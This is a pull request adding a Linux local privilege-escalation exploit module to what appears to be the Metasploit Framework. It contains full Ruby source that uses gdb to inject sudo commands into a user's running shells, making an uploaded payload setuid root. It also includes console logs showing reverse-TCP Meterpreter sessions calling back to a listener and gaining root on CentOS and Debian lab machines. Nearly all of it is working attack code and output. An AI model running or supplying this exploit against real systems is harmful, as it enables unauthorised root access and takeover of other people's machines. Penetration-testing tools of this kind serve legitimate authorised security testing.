### PR TITLE
Add ptrace Sudo Token Privilege Escalation module

### DIFF
--- a/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md
@@ -1,0 +1,136 @@
+## Description
+
+  This module attempts to gain root privileges by blindly injecting into
+  the session user's running shell processes and executing commands by
+  calling `system()`, in the hope that the process has valid cached sudo
+  tokens with root privileges.
+
+  The system must have gdb installed and permit ptrace.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * Debian 9.8 (x64)
+  * CentOS 7.4.1708 (x64)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/ptrace_sudo_token_priv_esc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **TIMEOUT**
+
+  Process injection timeout (seconds) (default: `30`)
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+### CentOS 7.4.1708 (x64)
+  
+  ```
+  msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc 
+  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
+  payload => linux/x64/meterpreter/reverse_tcp
+  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [+] YAMA ptrace scope is not restrictive
+  [+] SELinux deny_ptrace is disabled
+  [+] sudo is installed
+  [+] gdb is installed
+  [*] Searching for shell processes ...
+  [*] Found 3 running shell processes
+  [*] 2343, 2483, 2958
+  [*] Writing '/tmp/.ka44kFCm8XyMEZ' (329 bytes) ...
+  [*] Injecting into process 2343 ...
+  [*] Injecting into process 2483 ...
+  [*] Injecting into process 2958 ...
+  [+] /tmp/.ka44kFCm8XyMEZ setuid root successfully
+  [*] Executing payload...
+  [*] Transmitting intermediate stager...(126 bytes)
+  [*] Sending stage (3021284 bytes) to 172.16.191.141
+
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.141:53462) at 2019-08-10 02:49:48 -0400
+  [-] Failed to delete /tmp/.ka44kFCm8XyMEZ: stdapi_fs_delete_file: Operation failed: 1
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : centos-7-1708.localdomain
+  OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  meterpreter > 
+  ```
+
+### Debian 9.8 (x64)
+
+  ```
+  msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc 
+  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
+  payload => linux/x64/meterpreter/reverse_tcp
+  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [+] YAMA ptrace scope is not restrictive
+  [+] sudo is installed
+  [+] gdb is installed
+  [*] Searching for shell processes ...
+  [*] Found 5 running shell processes
+  [*] 661, 891, 23499, 23518, 23541
+  [*] Writing '/tmp/.Dpq90j6vOk' (329 bytes) ...
+  [*] Injecting into process 661 ...
+  [*] Injecting into process 891 ...
+  [*] Injecting into process 23499 ...
+  [*] Injecting into process 23518 ...
+  [+] /tmp/.Dpq90j6vOk setuid root successfully
+  [*] Executing payload...
+  [*] Transmitting intermediate stager...(126 bytes)
+  [*] Sending stage (3021284 bytes) to 172.16.191.232
+
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.232:50744) at 2019-08-10 02:54:34 -0400
+  [-] Failed to delete /tmp/.Dpq90j6vOk: stdapi_fs_delete_file: Operation failed: 1
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : debian-9-8-x64.local
+  OS           : Debian 9.8 (Linux 4.9.0-8-amd64)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  meterpreter > 
+  ```
+

--- a/modules/exploits/linux/local/ptrace_sudo_token_priv_esc.rb
+++ b/modules/exploits/linux/local/ptrace_sudo_token_priv_esc.rb
@@ -17,13 +17,17 @@ class MetasploitModule < Msf::Exploit::Local
     super(update_info(info,
       'Name'           => 'ptrace Sudo Token Privilege Escalation',
       'Description'    => %q{
-        This module attempts to gain root privileges by blindly injecting
-        into shell processes and executing commands using any valid sudo
-        tokens.
+        This module attempts to gain root privileges by blindly injecting into
+        the session user's running shell processes and executing commands by
+        calling `system()`, in the hope that the process has valid cached sudo
+        tokens with root privileges.
 
         The system must have gdb installed and permit ptrace.
 
-        This module has been tested successfully on Debian 9.8 (x64).
+        This module has been tested successfully on:
+
+        Debian 9.8 (x64); and
+        CentOS 7.4.1708 (x64).
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -34,6 +38,7 @@ class MetasploitModule < Msf::Exploit::Local
       'DisclosureDate' => '2019-03-24',
       'References'     =>
         [
+          ['EDB', '46989'],
           ['URL', 'https://github.com/nongiach/sudo_inject'],
           ['URL', 'https://www.kernel.org/doc/Documentation/security/Yama.txt'],
           ['URL', 'http://man7.org/linux/man-pages/man2/ptrace.2.html'],
@@ -64,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Local
         },
       'DefaultTarget'  => 0))
     register_options [
-      OptInt.new('TIMEOUT', [true, 'Timeout (seconds)', '60'])
+      OptInt.new('TIMEOUT', [true, 'Process injection timeout (seconds)', '30'])
     ]
     register_advanced_options [
       OptBool.new('ForceExploit', [false, 'Override check result', false]),
@@ -88,11 +93,19 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-   if yama_enabled?
+    if yama_enabled?
       vprint_error 'YAMA ptrace scope is restrictive'
       return CheckCode::Safe
     end
     vprint_good 'YAMA ptrace scope is not restrictive'
+
+    if command_exists? '/usr/sbin/getsebool'
+      if cmd_exec("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on && echo true").to_s.include? 'true'
+        vprint_error 'SELinux deny_ptrace is enabled'
+        return CheckCode::Safe
+      end
+      vprint_good 'SELinux deny_ptrace is disabled'
+    end
 
     unless command_exists? 'sudo'
       vprint_error 'sudo is not installed'
@@ -127,38 +140,67 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with Failure::BadConfig, "#{base_dir} is not writable"
     end
 
+    if nosuid? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
+    end
+
+    # Find running shell processes
+    shells = %w[ash ksh csh dash bash zsh tcsh fish sh]
+
+    system_shells = read_file('/etc/shells').to_s.each_line.map {|line|
+      line.strip
+    }.reject {|line|
+      line.starts_with?('#')
+    }.each {|line|
+      shells << line.split('/').last
+    }
+    shells = shells.uniq.reject {|shell| shell.blank?}
+
+    print_status 'Searching for shell processes ...'
+    pids = []
+    if command_exists? 'pgrep'
+      cmd_exec("pgrep '^(#{shells.join('|')})$' -u \"$(id -u)\"").to_s.each_line do |pid|
+        pids << pid.strip
+      end
+    else
+      shells.each do |s|
+        pidof(s).each {|p| pids << p.strip}
+      end
+    end
+
+    if pids.empty?
+      fail_with Failure::Unknown, 'Found no running shell processes'
+    end
+
+    print_status "Found #{pids.uniq.length} running shell processes"
+    vprint_status pids.join(', ')
+
+    # Upload payload
     @payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
     upload @payload_path, generate_payload_exe
 
-    print_status "Creating root shell #{@payload_path} ..."
+    # Blindly call system() in each shell process
+    pids.each do |pid|
+      print_status "Injecting into process #{pid} ..."
 
-    #shell_processes = cmd_exec('pgrep \'^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$\' -u "$(id -u)" | grep -v "^$$\$"').to_s.split("\n")
-    #print_status "Found #{shell_processes.length} shell processes"
+      cmds = "echo | sudo -S /bin/chown 0:0 #{@payload_path} >/dev/null 2>&1 && echo | sudo -S /bin/chmod 4755 #{@payload_path} >/dev/null 2>&1"
+      sudo_inject = "echo 'call system(\"#{cmds}\")' | gdb -q -n -p #{pid} >/dev/null 2>&1"
+      res = cmd_exec sudo_inject, nil, timeout
+      vprint_line res unless res.blank?
 
-    sudo_inject = <<-EOF
-    for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" | grep -v "^$$\$")
-    do
-      echo "Injecting process $pid -> "$(cat "/proc/$pid/comm")
-	    echo 'call system("echo | sudo -S /bin/chown 0:0 #{@payload_path} >/dev/null 2>&1 && echo | sudo -S /bin/chmod +x #{@payload_path} >/dev/null 2>&1 && echo | sudo -S /bin/chmod u+s #{@payload_path} >/dev/null 2>&1")' \
-		| gdb -q -n -p "$pid" >/dev/null 2>&1
-    done
-    EOF
+      next unless setuid? @payload_path
 
-    res = cmd_exec sudo_inject, nil, timeout
-    vprint_line res
-
-    unless setuid? @payload_path
-      fail_with Failure::Unknown, 'Failed to create setuid root shell'
+      print_good "#{@payload_path} setuid root successfully"
+      print_status 'Executing payload...'
+      res = cmd_exec "#{@payload_path} & echo "
+      vprint_line res
+      return
     end
-    print_good "#{@payload_path} setuid root successfully"
 
-    print_status 'Executing payload...'
-    res = cmd_exec "#{@payload_path} &"
-    vprint_line res
+    fail_with Failure::NoAccess, 'Failed to create setuid root shell. Session user has no valid cached sudo tokens.'
   end
 
   def on_new_session(session)
-    print_status "Removing #{payload_path} ..."
     if session.type.eql? 'meterpreter'
       session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
       session.fs.file.rm @payload_path

--- a/modules/exploits/linux/local/ptrace_sudo_token_priv_esc.rb
+++ b/modules/exploits/linux/local/ptrace_sudo_token_priv_esc.rb
@@ -1,0 +1,171 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ptrace Sudo Token Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges by blindly injecting
+        into shell processes and executing commands using any valid sudo
+        tokens.
+
+        The system must have gdb installed and permit ptrace.
+
+        This module has been tested successfully on Debian 9.8 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'chaignc', # sudo_inject
+          'bcoles'   # Metasploit
+        ],
+      'DisclosureDate' => '2019-03-24',
+      'References'     =>
+        [
+          ['URL', 'https://github.com/nongiach/sudo_inject'],
+          ['URL', 'https://www.kernel.org/doc/Documentation/security/Yama.txt'],
+          ['URL', 'http://man7.org/linux/man-pages/man2/ptrace.2.html'],
+          ['URL', 'https://lwn.net/Articles/393012/'],
+          ['URL', 'https://lwn.net/Articles/492667/'],
+          ['URL', 'https://linux-audit.com/protect-ptrace-processes-kernel-yama-ptrace_scope/'],
+          ['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html']
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           =>
+        [
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [['Auto', {}]],
+      'DefaultOptions' =>
+        {
+          'PrependSetresuid' => true,
+          'PrependSetresgid' => true,
+          'PrependFork'      => true,
+          'WfsDelay'         => 30
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptInt.new('TIMEOUT', [true, 'Timeout (seconds)', '60'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def timeout
+    datastore['TIMEOUT']
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def check
+   if yama_enabled?
+      vprint_error 'YAMA ptrace scope is restrictive'
+      return CheckCode::Safe
+    end
+    vprint_good 'YAMA ptrace scope is not restrictive'
+
+    unless command_exists? 'sudo'
+      vprint_error 'sudo is not installed'
+      return CheckCode::Safe
+    end
+    vprint_good 'sudo is installed'
+
+    unless command_exists? 'gdb'
+      vprint_error 'gdb is not installed'
+      return CheckCode::Safe
+    end
+    vprint_good 'gdb is installed'
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    unless check == CheckCode::Detected
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    @payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
+    upload @payload_path, generate_payload_exe
+
+    print_status "Creating root shell #{@payload_path} ..."
+
+    #shell_processes = cmd_exec('pgrep \'^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$\' -u "$(id -u)" | grep -v "^$$\$"').to_s.split("\n")
+    #print_status "Found #{shell_processes.length} shell processes"
+
+    sudo_inject = <<-EOF
+    for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" | grep -v "^$$\$")
+    do
+      echo "Injecting process $pid -> "$(cat "/proc/$pid/comm")
+	    echo 'call system("echo | sudo -S /bin/chown 0:0 #{@payload_path} >/dev/null 2>&1 && echo | sudo -S /bin/chmod +x #{@payload_path} >/dev/null 2>&1 && echo | sudo -S /bin/chmod u+s #{@payload_path} >/dev/null 2>&1")' \
+		| gdb -q -n -p "$pid" >/dev/null 2>&1
+    done
+    EOF
+
+    res = cmd_exec sudo_inject, nil, timeout
+    vprint_line res
+
+    unless setuid? @payload_path
+      fail_with Failure::Unknown, 'Failed to create setuid root shell'
+    end
+    print_good "#{@payload_path} setuid root successfully"
+
+    print_status 'Executing payload...'
+    res = cmd_exec "#{@payload_path} &"
+    vprint_line res
+  end
+
+  def on_new_session(session)
+    print_status "Removing #{payload_path} ..."
+    if session.type.eql? 'meterpreter'
+      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+      session.fs.file.rm @payload_path
+    else
+      session.shell_command_token "rm -f '#{@payload_path}'"
+    end
+  ensure
+    super
+  end
+end


### PR DESCRIPTION
Add ptrace Sudo Token Privilege Escalation module.

    This module attempts to gain root privileges by blindly injecting into
    the session user's running shell processes and executing commands by
    calling `system()`, in the hope that the process has valid cached sudo
    tokens with root privileges.

    The system must have gdb installed and permit ptrace.

## Scenarios

### CentOS 7.4.1708 (x64)

  ```
  msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc 
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165
  lhost => 172.16.191.165
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run
  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [+] YAMA ptrace scope is not restrictive
  [+] SELinux deny_ptrace is disabled
  [+] sudo is installed
  [+] gdb is installed
  [*] Searching for shell processes ...
  [*] Found 3 running shell processes
  [*] 2343, 2483, 2958
  [*] Writing '/tmp/.ka44kFCm8XyMEZ' (329 bytes) ...
  [*] Injecting into process 2343 ...
  [*] Injecting into process 2483 ...
  [*] Injecting into process 2958 ...
  [+] /tmp/.ka44kFCm8XyMEZ setuid root successfully
  [*] Executing payload...
  [*] Transmitting intermediate stager...(126 bytes)
  [*] Sending stage (3021284 bytes) to 172.16.191.141
  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.141:53462) at 2019-08-10 02:49:48 -0400
  [-] Failed to delete /tmp/.ka44kFCm8XyMEZ: stdapi_fs_delete_file: Operation failed: 1
  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : centos-7-1708.localdomain
  OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > 
  ```

### Debian 9.8 (x64)

  ```
  msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc 
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165
  lhost => 172.16.191.165
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run
  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [+] YAMA ptrace scope is not restrictive
  [+] sudo is installed
  [+] gdb is installed
  [*] Searching for shell processes ...
  [*] Found 5 running shell processes
  [*] 661, 891, 23499, 23518, 23541
  [*] Writing '/tmp/.Dpq90j6vOk' (329 bytes) ...
  [*] Injecting into process 661 ...
  [*] Injecting into process 891 ...
  [*] Injecting into process 23499 ...
  [*] Injecting into process 23518 ...
  [+] /tmp/.Dpq90j6vOk setuid root successfully
  [*] Executing payload...
  [*] Transmitting intermediate stager...(126 bytes)
  [*] Sending stage (3021284 bytes) to 172.16.191.232
  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.232:50744) at 2019-08-10 02:54:34 -0400
  [-] Failed to delete /tmp/.Dpq90j6vOk: stdapi_fs_delete_file: Operation failed: 1
  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : debian-9-8-x64.local
  OS           : Debian 9.8 (Linux 4.9.0-8-amd64)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > 
  ```